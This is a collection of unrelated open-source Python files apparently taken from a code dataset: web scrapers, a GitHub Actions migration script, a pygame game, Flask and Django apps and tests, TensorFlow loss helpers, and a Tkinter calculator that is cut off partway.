Felipe, Rodriguez Torres Sergio Andres\"\n__license__ = \"Apache 2.0\"\n\nos.chdir('../')\n\ndef scroll_to_end(wd):\n element = wd.find_element(By.TAG_NAME, 'body')\n for i in range(50):\n element.send_keys(Keys.PAGE_DOWN)\n time.sleep(0.3)\n\n\ndef fetch_image_urls(query: str, max_links_to_fetch: int, wd: webdriver, sleep_between_interactions: int = 1):\n # build the Google query\n search_url = \"https://www.google.com/search?safe=off&site=&tbm=isch&source=hp&q={q}&oq={q}&gs_l=img\"\n\n # load the page\n wd.get(search_url.format(q=query))\n\n image_urls = set()\n image_count = 0\n results_start = 0\n while image_count < max_links_to_fetch:\n scroll_to_end(wd)\n\n # get all image thumbnail results\n thumbnail_results = wd.find_elements(By.CSS_SELECTOR, \"img.Q4LuWd\")\n number_results = len(thumbnail_results)\n\n print(f\"Found: {number_results} search results. Extracting links from {results_start}:{number_results}\")\n\n for img in thumbnail_results[results_start:number_results]:\n # try to click every thumbnail such that we can get the real image behind it\n try:\n img.click()\n time.sleep(sleep_between_interactions)\n except Exception:\n continue\n\n # extract image urls \n actual_images = wd.find_elements(By.CSS_SELECTOR, 'img.n3VNCb')\n for actual_image in actual_images:\n if actual_image.get_attribute('src') and 'http' in actual_image.get_attribute('src'):\n image_urls.add(actual_image.get_attribute('src'))\n\n image_count = len(image_urls)\n\n if len(image_urls) >= max_links_to_fetch:\n print(f\"Found: {len(image_urls)} image links, done!\")\n break\n print(\"Found:\", len(image_urls), \"image links, looking for more ...\")\n time.sleep(30)\n\n # load_more_button = wd.find_elements(By.XPATH, '//input[@value=\"Show more results\"]')\n\n # load_more_button = wd.find_element(By.CSS_SELECTOR, \".mye4qd\")\n # if load_more_button:\n # load_more_button[0].click()\n\n # move the result startpoint further down\n results_start = len(thumbnail_results)\n\n return image_urls\n\n\ndef persist_image(folder_path: str, url: str):\n try:\n image_content = requests.get(url, timeout=5).content\n normalize_image_to_rgb(image_content, url, folder_path)\n except Exception as e:\n print(f\"ERROR - Could not download {url} - {e}\")\n\n\ndef search_and_download(search_term: str, target_path='./images', number_images=5):\n target_folder = os.path.join(target_path, '_'.join(search_term.lower().split(' ')))\n\n if not os.path.exists(target_folder):\n os.makedirs(target_folder)\n\n with webdriver.Chrome(service=Service(ChromeDriverManager().install())) as wd:\n res = fetch_image_urls(search_term, number_images, wd=wd, sleep_between_interactions=0.5)\n\n for elem in tqdm(res):\n persist_image(target_folder, elem)\n\n\ndef main():\n search_and_download(search_term=\"Activity Diagrams\", number_images=1000)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SergioRt1/An-analysis-of-diagram-images-on-Git-repositories","sub_path":"scrapping/scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42627324893","text":"\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nclass MelonCrawler:\n def search_song(self, q):\n \"\"\"\n 곡 명으로 멜론에서 검색한 결과 리스트를 리턴\n :param q: 검색할 곡 명\n :return: 결과 dict리스트\n \"\"\"\n \"\"\"\n 1. http://www.melon.com/search/song/index.htm\n 에 q={q}, section=song으로 parameter를 준 URL에\n requests를 사용해 요청\n 2. response.text를 사용해 BeautifulSoup인스턴스 soup생성\n 3. soup에서 적절히 결과를 가공\n 4. 결과 1개당 Song인스턴스 한개씩\n 5. 전부 리스트에 넣어 반환\n 6. 완☆성\n \"\"\"\n url = 'https://www.melon.com/search/song/index.htm'\n params = {\n 'q': q,\n 'section': 'song',\n }\n response = requests.get(url, params)\n soup = BeautifulSoup(response.text, 'lxml')\n tr_list = soup.select('form#frm_defaultList table > tbody > tr')\n # tr_list = soup.find('form', id='frm_defaultList').find('table').find('tbody').find_all('tr')\n\n result = []\n for tr in tr_list:\n # 빨간 맛 (Red Flavor)\n # song_id = re.search(r\"searchLog\\(.*'(\\d+)'\\)\", tr.select_one('td:nth-of-type(3) a.fc_gray').get('href')).group(1)\n song_id = tr.select_one('td:nth-of-type(1) input[type=checkbox]').get('value')\n title = tr.select_one('td:nth-of-type(3) a.fc_gray').get_text(strip=True)\n artist = tr.select_one('td:nth-of-type(4) span.checkEllipsisSongdefaultList').get_text(\n strip=True)\n album = tr.select_one('td:nth-of-type(5) a').get_text(strip=True)\n\n song = Song(song_id=song_id, title=title, artist=artist, album=album)\n result.append(song)\n return result\n","repo_name":"smallbee3/Crawler","sub_path":"lecture03_0126/melon_search_lhy.py","file_name":"melon_search_lhy.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72283508853","text":"import logging, pygit2\nimport os\nimport main\nfrom github import Github\nfrom pygit2 import GIT_SORT_TOPOLOGICAL, GIT_SORT_REVERSE, Signature\nimport subprocess\nimport click\n\nlogging.basicConfig(level=logging.INFO)\nlocal_repositories_path = \"./localrepos\"\nGA_BRANCH_NAME = \"ga-migration\"\n\n\ndef fullgit(repository_name):\n # Clone\n url_github = \"https://github.com/\"\n org_name = \"inveniosoftware\"\n\n # Setup GitHub\n # Get an access token at https://github.com/settings/tokens/new\n # and set it as env variable\n # e.g. start the script as `GH_ACCESS_TOKEN=$TOKEN python gitflow.py`\n g = Github(os.environ[\"GH_ACCESS_TOKEN\"])\n\n # TODO: Check if folder already exists\n logging.info(f\"Cloning {url_github}{org_name}/{repository_name}..\")\n\n repo = pygit2.clone_repository(\n f\"{url_github}{org_name}/{repository_name}\",\n f\"{local_repositories_path}/{repository_name}\",\n )\n\n gh_repo = g.get_repo(f\"{org_name}/{repository_name}\")\n\n # Walk commits\n for commit in repo.walk(repo.head.target, GIT_SORT_TOPOLOGICAL):\n repo.checkout_tree(commit)\n logging.info(f\"Checking out {commit.tree_id}\")\n if os.path.isfile(\n f\"{local_repositories_path}/{repository_name}/.travis.yml\"\n ):\n print(\"found .travis.yml\")\n break\n\n logging.info(f\"Branching to {GA_BRANCH_NAME}..\")\n\n # TODO: If the branch already exists, append a number\n # and update GA_BRANCH_NAME\n repo.branches.local.create(GA_BRANCH_NAME, commit)\n\n subprocess.run(\n f\"git checkout {GA_BRANCH_NAME}\",\n shell=True,\n check=True,\n cwd=f\"{local_repositories_path}/{repository_name}\",\n )\n\n # Apply the patches\n main.migrate_repo(f\"{local_repositories_path}/{repository_name}\")\n\n # git add .\n subprocess.run(\n f\"git add .\",\n shell=True,\n check=True,\n cwd=f\"{local_repositories_path}/{repository_name}\",\n )\n\n # git commit\n logging.info(f\"Committing the changes..\")\n subprocess.run(\n f\"git commit -m 'Migrate from Travis CI to GitHub Actions'\",\n shell=True,\n check=True,\n cwd=f\"{local_repositories_path}/{repository_name}\",\n )\n\n # Switch from the HTTPS remote to the SSH one,\n # to allow non-interactive passwordless push if a key is available\n # TODO: just clone from the SSH origin from the beginning\n subprocess.run(\n f\"git remote set-url origin git@github.com:{org_name}/{repository_name}.git\",\n shell=True,\n check=True,\n cwd=f\"{local_repositories_path}/{repository_name}\",\n )\n\n # Push the new ga-migration branch\n logging.info(f\"Pushing branch '{GA_BRANCH_NAME}'\")\n subprocess.run(\n f\"git push --set-upstream origin ga-migration\",\n shell=True,\n check=True,\n cwd=f\"{local_repositories_path}/{repository_name}\",\n )\n\n # Look for the GA-migration issue\n open_issues = gh_repo.get_issues(state=\"open\")\n number = 0\n for issue in open_issues:\n if (\n \"migration to ga\" in issue.title.lower()\n or \"migration to github\" in issue.title.lower()\n ):\n number = issue.number\n logging.info(\n f\"Found the issue tracking the migration.. (#{number})\"\n )\n\n if number == 0:\n issue = gh_repo.create_issue(\n title=\"global: migration to github-actions from travis\"\n )\n number = issue.number\n logging.info(f\"Created issue {issue}\")\n\n # Create the Pull Request on GitHub\n pr = gh_repo.create_pull(\n title=\"Migrate to GH Actions\",\n body=f\"This PR was prepared by an [automated action](https://github.com/inveniosoftware/automation-tools/tree/master/automation_tools/scripts/ga-migration). Closes #{number}\",\n head=GA_BRANCH_NAME,\n base=\"master\",\n )\n logging.info(f\"Created Pull Request on GitHub {pr}\")\n\n\n@click.command()\n@click.option(\"--reponame\", help=\"Repository name\")\ndef pipeline(reponame):\n fullgit(reponame)\n\n\nif __name__ == \"__main__\":\n pipeline()\n","repo_name":"inveniosoftware/automation-tools","sub_path":"automation_tools/scripts/ga-migration/gitflow.py","file_name":"gitflow.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29469757487","text":"from itertools import cycle\nimport random\nimport sys\n\nimport pygame\nfrom pygame.locals import *\n\nSCREEN_WIDTH = 350\nSCREEN_HEIGHT = 600\nSPEED = 10\nGRAVITY = 1\nGAME_SPEED = 10\n\nGROUND_WIDTH = 2 * SCREEN_WIDTH\nGROUND_HEIGHT = 100\n\nPIPE_WIDTH = 80\nPIPE_HEIGHT = 500\n\nPIPE_GAP = 200\n\nClock = pygame.time.Clock()\n\n\nclass Bird(pygame.sprite.Sprite):\n\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n\n self.images = [pygame.image.load('redbird-upflap.png').convert_alpha(),\n pygame.image.load('redbird-midflap.png').convert_alpha(),\n pygame.image.load('redbird-downflap.png').convert_alpha()]\n\n self.speed = SPEED\n self.angle = 0\n\n self.current_image = 0\n\n self.image = pygame.image.load('redbird-upflap.png').convert_alpha()\n self.mask = pygame.mask.from_surface(self.image)\n\n self.rect = self.image.get_rect()\n self.rect[0] = SCREEN_WIDTH / 2 - 12\n self.rect[1] = SCREEN_HEIGHT / 2 - 12\n\n def update(self):\n self.current_image = (self.current_image + 1) % 3\n self.image = pygame.transform.rotate(self.images[self.current_image], self.angle)\n\n self.speed += GRAVITY\n self.rect[1] += self.speed\n self.angle -= 5\n if self.angle <= -35:\n self.angle = -35\n\n def bump(self):\n self.speed = -(SPEED + 2)\n self.angle = 45\n\n\nclass Ground(pygame.sprite.Sprite):\n\n def __init__(self, xpos):\n pygame.sprite.Sprite.__init__(self)\n\n self.image = pygame.image.load('base.png').convert_alpha()\n self.image = pygame.transform.scale(self.image, (GROUND_WIDTH, GROUND_HEIGHT))\n\n self.mask = pygame.mask.from_surface(self.image)\n\n self.rect = self.image.get_rect()\n self.rect[0] = xpos\n self.rect[1] = SCREEN_HEIGHT - GROUND_HEIGHT\n\n def update(self):\n self.rect[0] -= GAME_SPEED\n\nclass Pipe(pygame.sprite.Sprite):\n\n def __init__(self, xpos, ysize):\n pygame.sprite.Sprite.__init__(self)\n\n self.image = pygame.load.image('pipe-green.png')\n self.image = pygame.transform.scale(self.image, (PIPE_WIDTH, PIPE_HEIGHT))\n self.rect = self.image.get_rect()\n self.rect[0] = xpos\n\n\ndef is_off_screen(sprite):\n return sprite.rect[0] < -(sprite.rect[2])\n\ndef is_bird_off_screen(sprite):\n return sprite.rect[1] < 0\n\ndef collide(group1, group2):\n return pygame.sprite.groupcollide(group1, group2, False, False, pygame.sprite.collide_mask)\n\ndef gameOver():\n GAME_OVER = pygame.image.load('gameover.png')\n screen.blit(GAME_OVER, (SCREEN_WIDTH / 2 - 100, SCREEN_HEIGHT / 2 - 30))\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\nBACKGROUND = pygame.image.load('background-day.png')\nBACKGROUND = pygame.transform.scale(BACKGROUND, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nbird_group = pygame.sprite.Group()\nbird = Bird()\nbird_group.add(bird)\n\nground_group = pygame.sprite.Group()\nfor i in range(2):\n ground = Ground(GROUND_WIDTH * i)\n ground_group.add(ground)\n\n\ndef game():\n while True:\n Clock.tick(24)\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n\n if event.type == KEYDOWN:\n if event.key == K_SPACE:\n bird.bump()\n\n screen.blit(BACKGROUND, (0, 0))\n\n if is_off_screen(ground_group.sprites()[0]):\n ground_group.remove(ground_group.sprites()[0])\n new_ground = Ground(GROUND_WIDTH - 20)\n ground_group.add(new_ground)\n\n if is_bird_off_screen(bird_group.sprites()[0]):\n gameOver()\n pygame.time.wait(1000)\n break\n\n bird_group.update()\n ground_group.update()\n\n bird_group.draw(screen)\n ground_group.draw(screen)\n\n if collide(bird_group, ground_group):\n gameOver()\n pygame.time.wait(1000)\n break\n\n pygame.display.update()\n\n\ngame()\n","repo_name":"maironAzevedo/reimagined-spoon","sub_path":"flappybird/Flappy.py","file_name":"Flappy.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5730171231","text":"from PIL import Image\n\nprogram = {\n '000': '0',\n '001': '1',\n '010': '0',\n '011': '1',\n '100': '1',\n '101': '0',\n '110': '1',\n '111': '0'\n}\n\nROWS = 500\nCOLS = 500\n\nhistory = [{0}]\n\nfor i in range(0, ROWS - 1):\n history.append(set())\n for j in range(-COLS, COLS):\n if program[''.join(['1' if j - 1 in history[-2] else '0', '1' if j in history[-2] else '0', '1' if j + 1 in history[-2] else '0'])] == '1':\n history[-1].add(j)\n\nimg = Image.new('RGB', (COLS * 2, ROWS), \"white\")\nfor row, cols in enumerate(history):\n for col in cols:\n img.putpixel((col + COLS, row), (0, 0, 0))\n\nimg.save(\"im.png\", \"png\")\n","repo_name":"vfxlightning/sejt","sub_path":"cellular.py","file_name":"cellular.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74880687091","text":"#!/usr/bin/env python\n\nfrom flask import Flask, jsonify\nfrom flask_cors import CORS\nfrom paint.server.api import api\n\napp = Flask(__name__)\nCORS(app)\napp.config.from_mapping(\n # To nie powinno być commitowane na gita.\n SECRET_KEY=\"7b735b01a8d30801b6da30978d4e14a6d27a5b46036d8f4182bc96c027beed8c\",\n)\napp.register_blueprint(api)\n\n\n@app.route(\"/api/home\", methods=['GET'])\ndef return_home():\n return jsonify({\n 'message': 'Hello, World!'\n })\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=8080)\n","repo_name":"mdretkie/paint-2023z","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27772956595","text":"from CX import CSFlow\nimport tensorflow as tf\n\n\ndef random_sampling(tensor_NHWC, n, indices=None):\n N, H, W, C = tf.convert_to_tensor(tensor_NHWC).shape.as_list()\n S = H * W\n tensor_NSC = tf.reshape(tensor_NHWC, [N, S, C])\n all_indices = list(range(S))\n shuffled_indices = tf.random_shuffle(all_indices)\n indices = tf.gather(shuffled_indices, list(range(n)), axis=0) if indices is None else indices\n indices_old = tf.random_uniform([n], 0, S, tf.int32) if indices is None else indices\n # print(\"1\", tensor_NSC.shape)\n res = tf.gather(tensor_NSC, indices, axis=1)\n # print(\"2\", res.shape)\n return res, indices\n\ndef random_pooling(feats, output_1d_size=100):\n is_input_tensor = type(feats) is tf.Tensor\n\n if is_input_tensor:\n feats = [feats]\n\n # convert all inputs to tensors\n feats = [tf.convert_to_tensor(feats_i) for feats_i in feats]\n\n N, H, W, C = feats[0].shape.as_list()\n feats_sampled_0, indices = random_sampling(feats[0], output_1d_size ** 2)\n res = [feats_sampled_0]\n for i in range(1, len(feats)):\n feats_sampled_i, _ = random_sampling(feats[i], -1, indices)\n res.append(feats_sampled_i)\n\n res = [tf.reshape(feats_sampled_i, [N, output_1d_size, output_1d_size, C]) for feats_sampled_i in res]\n if is_input_tensor:\n return res[0]\n return res\n\ndef crop_quarters(feature_tensor):\n N = tf.shape(feature_tensor)[0]\n fH = tf.to_float(tf.shape(feature_tensor)[1])\n fW = tf.to_float(tf.shape(feature_tensor)[2])\n fC = tf.shape(feature_tensor)[3]\n quarters_list = []\n quarter_size = [N, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))),\n tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), fC]\n quarters_list.append(tf.slice(feature_tensor,\n [0, 0, 0, 0], quarter_size))\n quarters_list.append(tf.slice(feature_tensor,\n [0, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))), 0, 0],quarter_size))\n quarters_list.append(tf.slice(feature_tensor,\n [0, 0, tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), 0], quarter_size))\n quarters_list.append(tf.slice(feature_tensor,\n [0, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))), tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), 0], quarter_size))\n feature_tensor = tf.concat(quarters_list, axis=0)\n return feature_tensor\n\ndef crop_quarters_sep(feature_tensor):\n N = tf.shape(feature_tensor)[0]\n fH = tf.to_float(tf.shape(feature_tensor)[1])\n fW = tf.to_float(tf.shape(feature_tensor)[2])\n fC = tf.shape(feature_tensor)[3]\n quarters_list = []\n quarter_size = [N, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))),\n tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), fC]\n quarters_1 = tf.slice(feature_tensor,[0, 0, 0, 0], quarter_size)\n quarters_2 = tf.slice(feature_tensor,[0, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))), 0, 0],quarter_size)\n quarters_3 = tf.slice(feature_tensor,[0, 0, tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), 0], quarter_size)\n quarters_4 = tf.slice(feature_tensor,[0, tf.to_int32(tf.round(tf.multiply(fH, tf.constant(1./2)))),\n tf.to_int32(tf.round(tf.multiply(fW, tf.constant(1./2)))), 0], quarter_size)\n return quarters_1,quarters_2,quarters_3,quarters_4\n\ndef ident(feat):\n return feat\n\ndef crop_quarters(feature_tensor):\n N, fH, fW, fC = feature_tensor.shape.as_list()\n quarters_list = []\n quarter_size = [N, round(fH / 2), round(fW / 2), fC]\n quarters_list.append(tf.slice(feature_tensor, [0, 0, 0, 0], quarter_size))\n quarters_list.append(tf.slice(feature_tensor, [0, round(fH / 2), 0, 0], quarter_size))\n quarters_list.append(tf.slice(feature_tensor, [0, 0, round(fW / 2), 0], quarter_size))\n quarters_list.append(tf.slice(feature_tensor, [0, round(fH / 2), round(fW / 2), 0], quarter_size))\n feature_tensor = tf.concat(quarters_list, axis=0)\n return feature_tensor\n\n\ndef CX_loss_helper(vgg_A, vgg_B, CX_config):\n if CX_config.crop_quarters is True:\n vgg_A = crop_quarters(vgg_A)\n vgg_B = crop_quarters(vgg_B)\n\n N, fH, fW, fC = vgg_A.shape.as_list()\n if fH * fW <= CX_config.max_sampling_1d_size ** 2:\n print(' #### Skipping pooling for CX....')\n else:\n print(' #### pooling for CX %d**2 out of %dx%d' % (CX_config.max_sampling_1d_size, fH, fW))\n vgg_A, vgg_B = random_pooling([vgg_A, vgg_B], output_1d_size=CX_config.max_sampling_1d_size)\n\n CX_loss,_ = CSFlow.CX_loss(vgg_A, vgg_B,\n distance=CX_config.Dist,\n nnsigma=CX_config.nn_stretch_sigma,\n w_spatial=CX_config.w_spatial)\n return CX_loss\n","repo_name":"ceciliavision/zoom-learn-zoom","sub_path":"CX/CX_helper.py","file_name":"CX_helper.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":306,"dataset":"github-code","pt":"21"} +{"seq_id":"11664537193","text":"from django.urls import reverse\r\nfrom rest_framework import status\r\nfrom rest_framework.test import APIClient\r\nfrom django.test import TestCase\r\n\r\nfrom books.models import Book\r\n\r\nBOOK_URL = reverse(\"books:books-list\")\r\n\r\n\r\nclass BookViewSetTestCase(TestCase):\r\n def setUp(self):\r\n self.fixture_data = {}\r\n self.client = APIClient()\r\n self.book = Book.objects.create(\r\n title=\"Test Book\",\r\n author=\"Test Author\",\r\n cover=1,\r\n inventory=5,\r\n daily_fee=1.99,\r\n )\r\n\r\n def test_permissions_for_list(self):\r\n url = BOOK_URL\r\n response = self.client.get(url)\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n\r\n def test_permissions_for_create(self):\r\n url = BOOK_URL\r\n data = {\r\n \"title\": \"New Book\",\r\n \"author\": \"New Author\",\r\n \"cover\": 0,\r\n \"inventory\": 10,\r\n \"daily_fee\": 2.99,\r\n }\r\n response = self.client.post(url, data)\r\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\r\n\r\n def test_permissions_for_retrieve(self):\r\n url = reverse(\"books:books-detail\", kwargs={\"pk\": self.book.id})\r\n response = self.client.get(url)\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n\r\n def test_permissions_for_update(self):\r\n url = reverse(\"books:books-detail\", kwargs={\"pk\": self.book.id})\r\n data = {\r\n \"title\": \"Updated Book\",\r\n \"author\": \"Updated Author\",\r\n \"cover\": 0,\r\n \"inventory\": 10,\r\n \"daily_fee\": 2.99,\r\n }\r\n response = self.client.put(url, data)\r\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\r\n\r\n def test_permissions_for_partial_update(self):\r\n url = reverse(\"books:books-detail\", kwargs={\"pk\": self.book.id})\r\n data = {\r\n \"title\": \"Updated Book\",\r\n \"inventory\": 10,\r\n }\r\n response = self.client.patch(url, data)\r\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\r\n\r\n def test_permissions_for_delete(self):\r\n url = reverse(\"books:books-detail\", kwargs={\"pk\": self.book.id})\r\n response = self.client.delete(url)\r\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\r\n\r\n def test_get_queryset(self):\r\n url = BOOK_URL\r\n response = self.client.get(url)\r\n self.assertEqual(len(response.data), 1)\r\n self.assertEqual(response.data[0][\"title\"], self.book.title)\r\n self.assertEqual(response.data[0][\"inventory\"], self.book.inventory)\r\n self.assertEqual(response.data[0][\"cover\"], self.book.cover)\r\n self.assertEqual(response.data[0][\"daily_fee\"], str(self.book.daily_fee))\r\n","repo_name":"AnnaKabatova/library-service","sub_path":"books/tests/book_view_test.py","file_name":"book_view_test.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74953367412","text":"# coding=utf-8\n__author__ = 'xiaohengli@pathbook.com.cn'\n\nimport time\nfrom drivers import *\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\n\nclass TestCase(unit.TestCase):\n\n def setUp(self):\n self.driver = self.app(__file__)\n self.driver.login()\n\n def tearDown(self):\n self.driver.switch_to_home()\n\n def test_Subplatform(self):\n '''\n 下拉框中显示:默认、运行中、宕机、异常、未启动\n :return:\n '''\n li=self.driver.find_id('main_menu').find_tags('li')[1]\n above=li.find_element_by_link_text(u'系统监控')\n self.driver.action_chains().move_to_element(above).perform()\n #鼠标悬停在子平台监控上\n li.find_element_by_link_text(u'子平台监控').click()\n opts=self.driver.find_element_by_id('state').find_tags('option')\n self.assertTrue(opts[0].text==u'默认')\n tuple=(u'默认',u'运行中',u'宕机',u'异常',u'未启动')\n isExist =True\n for opt in opts:\n type=opt.get_attribute('text')\n print(type)\n if not type in tuple:\n isExist = False\n break\n self.assertTrue(isExist,u'下拉框选项没有被选中')\n\n\n def test_Subplatformbox(self):\n '''\n 下拉框中选中:运行中\n :return:\n '''\n li=self.driver.find_id('main_menu').find_tags('li')[1]\n above=li.find_element_by_link_text(u'系统监控')\n self.driver.action_chains().move_to_element(above).perform()\n #鼠标悬停在子平台监控上\n li.find_element_by_link_text(u'子平台监控').click()\n opts=self.driver.find_element_by_id('state').find_tags('option')\n for opt in opts:\n #判断text里面的内容等不等于空闲\n\n if opt.get_attribute('text')==u'运行中':\n opt.click()\n self.assertTrue(opt.is_selected(),u'下拉框选项没有被选中')\n\n def test_zitingt(self):\n '''\n 可在其他选项中任意切换,该选项正常回显在文本框中\n :return:\n '''\n above=self.driver.find_element_by_link_text(u'系统监控')\n self.driver.action_chains().move_to_element(above).perform()\n #鼠标悬停在日志查询上\n self.driver.find_element_by_link_text(u'子平台监控').click()\n Select( self.driver.find_element_by_id(\"state\")).select_by_visible_text(u\"宕机\")\n self.driver.find_element_by_css_selector(\"option[value=\\\"-1\\\"]\").click()\n Select(self.driver.find_element_by_id(\"state\")).select_by_visible_text(u\"异常\")\n self.driver.find_element_by_css_selector(\"option[value=\\\"-2\\\"]\").click()\n self.driver.find_element_by_id(\"query\").click()\n self.assertEqual(u\"子平台监控\", self.driver.title)\n\n\n def test_RefreshSubplatform(self):\n '''\n 点击查询\n :return:\n '''\n above=self.driver.find_element_by_link_text(u'系统监控')\n self.driver.action_chains().move_to_element(above).perform()\n #鼠标悬停在日志查询上\n self.driver.find_element_by_link_text(u'子平台监控').click()\n self.driver.find_element_by_id(\"query\").click()\n self.assertEqual(u\"子平台监控\", self.driver.title)\n","repo_name":"cash2one/AutoDriver","sub_path":"testcase/Autobook/op/test_op_Submonitoring.py","file_name":"test_op_Submonitoring.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35418552518","text":"import json\nfrom flask import Flask, jsonify, request, make_response\n\nbasic_api = Flask(__name__)\n\nwith open(\"resume.json\") as json_data:\n\tresume = json.load(json_data)\n\n@basic_api.route('/', methods=['GET'])\ndef display_resume():\n\tif request.method == 'GET':\n\t\treturn make_response(jsonify(resume), 200)\n\nif __name__ == '__main__':\n basic_api.run(debug=False, host='0.0.0.0', port=8080)","repo_name":"sheltowt/personal_site_as_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30410757051","text":"import tkinter\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\n# These are the global variables.\r\nval = \"\"\r\nA = 0\r\noperator = \"\"\r\n# Defined command of whole button used in the Calculator.\r\ndef btn_1_isclicked():\r\n global val\r\n val = val + \"1\"\r\n data.set(val)\r\n\r\ndef btn_2_isclicked():\r\n global val\r\n val = val + \"2\"\r\n data.set(val)\r\n\r\ndef btn_3_isclicked():\r\n global val\r\n val = val + \"3\"\r\n data.set(val)\r\n\r\ndef btn_4_isclicked():\r\n global val\r\n val = val + \"4\"\r\n data.set(val)\r\n\r\ndef btn_5_isclicked():\r\n global val\r\n val = val + \"5\"\r\n data.set(val)\r\n\r\ndef btn_6_isclicked():\r\n global val\r\n val = val + \"6\"\r\n data.set(val)\r\n\r\ndef btn_7_isclicked():\r\n global val\r\n val = val + \"7\"\r\n data.set(val)\r\n\r\ndef btn_8_isclicked():\r\n global val\r\n val = val + \"8\"\r\n data.set(val)\r\n\r\ndef btn_9_isclicked():\r\n global val\r\n val = val + \"9\"\r\n data.set(val)\r\n\r\ndef btn_0_isclicked():\r\n global val\r\n val = val + \"0\"\r\n data.set(val)\r\n\r\ndef btn_plus_clicked():\r\n global val\r\n global operator\r\n global A\r\n A = float(val)\r\n operator = \"+\"\r\n val = val + \"+\"\r\n data.set(val)\r\n\r\ndef btn_minus_clicked():\r\n global val\r\n global operator\r\n global A\r\n A = float(val)\r\n operator = \"-\"\r\n val = val + \"-\"\r\n data.set(val)\r\n\r\ndef btn_multi_clicked():\r\n global val\r\n global operator\r\n global A\r\n A = float(val)\r\n operator = \"*\"\r\n val = val + \"*\"\r\n data.set(val)\r\n\r\ndef btn_div_clicked():\r\n global val\r\n global operator\r\n global A\r\n A = float(val)\r\n operator = \"/\"\r\n val = val + \"/\"\r\n data.set(val)\r\n\r\ndef c_pressed():\r\n global A\r\n global operator\r\n global val\r\n\r\n val = \"\"\r\n A = 0\r\n operator = \"\"\r\n data.set(val)\r\n\r\ndef erase_pressed():\r\n global A\r\n global operator\r\n global val\r\n erase = data.get()\r\n pj = len(erase)\r\n erase = erase[0:(pj-1)]\r\n val = erase\r\n data.set(val)\r\n \r\n\r\n\r\ndef result():\r\n global A\r\n global operator\r\n global val\r\n val2 = val\r\n if operator == \"+\":\r\n X = float((val2.split(\"+\")[1]))\r\n C = A + X\r\n data.set(C)\r\n val = str(C)\r\n elif operator == \"-\":\r\n X = float((val2.split(\"-\")[1]))\r\n C = A - X\r\n data.set(C)\r\n val = str(C)\r\n elif operator == \"*\":\r\n X = float((val2.split(\"*\")[1]))\r\n C = A*X\r\n data.set(C)\r\n val = str(C)\r\n elif operator == \"/\":\r\n X = float((val2.split(\"/\")[1]))\r\n if X == 0:\r\n messagebox.showerror(\"Error\",\"Division by 0 Not supported\")\r\n A = \"\"\r\n val = \"\"\r\n data.set(val)\r\n else:\r\n C = float(A / X)\r\n data.set(C)\r\n val = str(C)\r\n\r\n \r\n\r\n\r\n#calculator screen orientation \r\nroot = tkinter.Tk()\r\nroot.geometry(\"400x400+600+200\")\r\nroot.resizable(1,1)\r\nroot.title(\"Calculator\")\r\n\r\n# these are the frame in which the button are designed\r\ndata = StringVar()\r\nlbl = Label(\r\n root,\r\n text = \"Label\",\r\n anchor = SE,\r\n font = (\"comic sans\",20),\r\n textvariable = data,\r\n background = \"#000000\",\r\n fg = \"#ffffff\",\r\n )\r\nlbl.pack(expand = True, fill = \"both\")\r\n\r\nbtnrow1 = Frame(root,bg=\"#000000\")\r\nbtnrow1.pack(expand = True, fill = \"both\",)\r\n \r\nbtnrow2 = Frame(root)\r\nbtnrow2.pack(expand = True, fill = \"both\")\r\n\r\nbtnrow3 = Frame(root)\r\nbtnrow3.pack(expand = True, fill = 